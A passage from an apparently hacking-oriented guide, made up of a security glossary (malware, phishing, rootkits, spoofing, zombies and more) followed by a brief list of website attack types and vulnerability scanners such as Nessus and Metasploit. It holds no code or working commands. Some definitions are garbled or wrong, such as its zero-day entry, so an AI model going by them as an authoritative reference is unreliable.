that triggers a malicious action when certain
conditions are met. The most common version
is the time bomb.
LulzSec:  LulzSec is an Anonymous offshoot.
It’s best-known actions were hacking user
information from the website of Sony Pictures
and for allegedly shutting down the CIA
website with a DDoS attack. LulzSec’s best
known, however, for Hector Xavier Monsegur,
a.k.a. “Sabu,” a hacker turned FBI informant,
whose intel led to the arrest of four other
LulzSec members. He faces the possibility of a
long prison term despite his cooperation.
Malware: A software program designed to
hijack, damage, or steal information from a
device or system. Examples include spyware,
adware, rootkits, viruses, keyloggers, and many
more. The software can be delivered in a
number of ways, from decoy websites and
spam to USB drives.
Master: The computer in a botnet that
controls, but is not controlled by, all the
other devices in the network. It’s also the
computer to which all other devices report,
sending information, such as credit card
numbers, to be processed. Control by the
master of the bots is usually via IRC.
NSA:  The National Security Agency is the U.S.
intelligence group dedicated to intercepting
and analyzing data, specifically electronic
data. Although not the only intelligence
organization in the U.S., much less the world,
to engage in suspect surveillance, thanks to
former NSA contract analyst Edward
Snowden’s leak of the agency’s classified
documents, it has become the most celebrated
and reviled one. You can find a complete
guide to the NSA and its many programs here.
Payload: The cargo of a data transmission is
called the payload. In black hat hacking, it
refers to the part of the virus that
accomplishes the action, such as destroying
data, harvesting information, or hijacking the
computer.
Packet sniffer: Sniffers are programs designed
to detect and capture certain types of data.
Packet sniffers are designed to detect packets
traveling online. Packets are packages of
information traveling on the Internet that
contain the destination address in addition to
content. Packet can be used to capture login
information and passwords for a device or
computer network.
Pentest: A penetration test, or the short form
pentest, is an attack on a computer system
with the intention of finding security
weaknesses, potentially gaining access to it,
its functionality and data.
Phishing: Tricking someone into giving you
their personal information, including login
information and passwords, credit card
numbers, and so on by imitating legitimate
companies, organizations, or people online.
Phishing’s often done via fake emails or links
to fraudulent websites.
Phreaker :  Considered the original computer
hackers, phreakers, or phone phreakers, hit the
scene in the 60s and made their mark by
circumventing telecommunications security
systems to place calls, including long
distance, for free. By using electronic
recording devices, or even simply creating
tones with a whist le, phreakers tricked the
systems into thinking it was a valid call. One
of the first to find prominence was “Captain
Crunch,” a phreaker who realized the toy
whistle that came as a prize in a box of
Captain Crunch cereal could be used to mimic
the tone frequencies used by
telecommunications companies to validate
and route calls.
Polymorphic Virus : A polymorphic virus is a
virus that will change its digital footprint every
time it replicates. Antivirus software relies on
a constantly updated and evolving database
of virus signatures to detect any virus that
may have infected a system. By changing its
signature upon replication, a polymorphic
virus may elude antivirus software, making it
very hard to eradicate.
Remote access: Remote control is the process
of getting a target computer to recognize your
keystrokes as its own, like changing a TV with
a remote control. Gaining remote access
allows you to run the target machine
completely by using your own, allowing for the
transfer of files between the target and the
host.
Rootkit: A rootkit is a set of software
programs used to gain administrator-level
access to a system and set up malware, while
simultaneously camouflaging the takeover.
Script kiddie: A pejorative term for a would-
be cracker without technical skills. Script
kiddies use prefab cracking tools to attack
systems and deface them, often in an attempt
to score points with their peers.
Social engineering: A custodian is to a janitor
as a social engineer is to a con man. Social
engineering is conning people into giving you
confidential information, such as passwords to
their accounts. Given the difficulty of breaking,
128-bit encryption with brute force, for
example, social engineering is an integral
element of cracking. Examples include
phishing and spear-phishing.
Spam: Unwanted and unsolicited email and
other electronic messages that attempt to
convince the receiver to either purchase a
product or service, or use that prospect to
defraud the recipient. The largest and most
profitable spamming organizations often use
botnets to increase the amount of spam they
send (and therefore the amount of money they
make).
Spear-phishing: A more focused type of
phishing, targeting a smaller group of targets,
from a department within a company or
organization down to an individual.
Spoofing: Email spoofing is altering the header
of an email so that it appears to come from
elsewhere. A black hat hacker, for instance,
might alter his email header so it appears to
come from your bank. IP spoofing is the
computer version, in which a packet is sent to
a computer with the IP altered to imitate a
trusted host in the hope that the packet will
be accepted and allow the sender access to
the target machine.
Spyware: Spyware is a type of malware that is
programmed to hide on a target computer or
server and send back information to the
master server, including login and password
information, bank account information, and
credit card numbers.
Syrian Electronic Army: The SEA is a pro-
government hacking group, best known for
defacing high-profile publications like the New
York Times and National Public Radio (and
the Daily Dot). Recently, Vice and Krebs on
Security have doxed several alleged members
of the group. Some have accused them of
being less hackers than script kiddies.
Time bomb: A virus whose payload is
deployed at or after a certain time.
Trojan horse: A Trojan is a type of malware
that masquerades as a desirable piece of
software. Under this camouflage, it delivers its
payload and usually installs a back door in
the infected machine.
Virus: Self-replicating malware that injects
copies of itself in the infected machine. A
virus can destroy a hard drive, steal
information, log keystrokes, and many other
malicious activities.
Vulnerability: A weak spot hackers can exploit
to gain access to a machine.
Wardriving : Wardriving is the act of driving
around in a vehicle with the purpose of finding
an open, unsecured Wi-Fi Many times, the
range of a wireless network will exceed the
perimeter of a building and create zones in
public places that can be exploited to gain
entry to the network. Black hats, and even
gray hats, will often use a GPS system to
make maps of exploitable zones so they can
be used at a later time or passed on to others.
Wardriving is not the only way this task is
performed – there are Warbikers and
Warwalkers too. As you can see, it is
imperative that your WiFi network is secure
because there are entities out there looking
for any opening to ply their trade.
Whaling: Spear-phishing that targets the
upper management of for-profit companies,
presumably in the hope that their higher net
worth will result in either more profit, if the
cracker is after financial gain, or that their
higher profile will ensure the gray hat hacker
more exposure for his or her cause.
White hat: An ethical hacker who uses his
skills in the service of social good. The term
may also be applied to a hacker who helps a
company or organization, or users in general,
by exposing vulnerabilities before black hat
hackers do.
Worm: Self-replicating, standalone malware.
As a standalone it does not report back to a
master, and unlike a virus it does not need to
attach itself to an existing program. It often
does no more than damage or ruin the
computers it is transmitted to. But it’s
sometimes equipped with a payload, usually
one that installs back doors on infected
machine to make a botnet.
Zero day exploit:  A zero day attack is a
previously unknown vulnerability in a system.
A zero day attack is the first such use of the
exploit by a cracker.
Zombie / Zombie Drone: A zombie is a
malware program that can be used by a black
hat cracker to remotely take control of a
system so it can be used as a zombie drone
for further attacks, like spam emails or Denial
of Service attacks, without a user’s knowledge.
This helps cover the black hat’s tracks and
increases the magnitude of their activities by
using your resources for their own devious
purposes. Rarely will the user infected with a
zombie even know it’s there, as zombies are
normally benign and non-destructive in and of
themselves. Zombies can be introduced to a
system by simply opening an infected email
attachment, but most often they are received
through non-mainstream sites like file sharing
sites, chat groups, adult websites and online
casinos that force you to download their
media player to have access to the content on
their site, using the installed player itself as
the delivery mechanism.

Method of Hacking a Website

.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack Tools:
Acunetix:
Acunetix is one of my favorite tool to find a
venerability in any web application It
automatically checks your web applications
for SQL Injection, XSS & other web
vulnerabilities.
Nessus:
Nessus is the best unix venerability testing
tool and among the best to run on windows.
Key features of this software include Remote
and local file security checks a client/server
architecture with a GTK graphical interface
etc.
Retina:
Retina is another Vulnerability Assessment
tool,It scans all the hosts on a network and
report on any vulnerabilities found.
Metasploit Framework:
The Metasploit Framework is the open source
penetration testing framework with the world’s
largest database of public and tested exploits.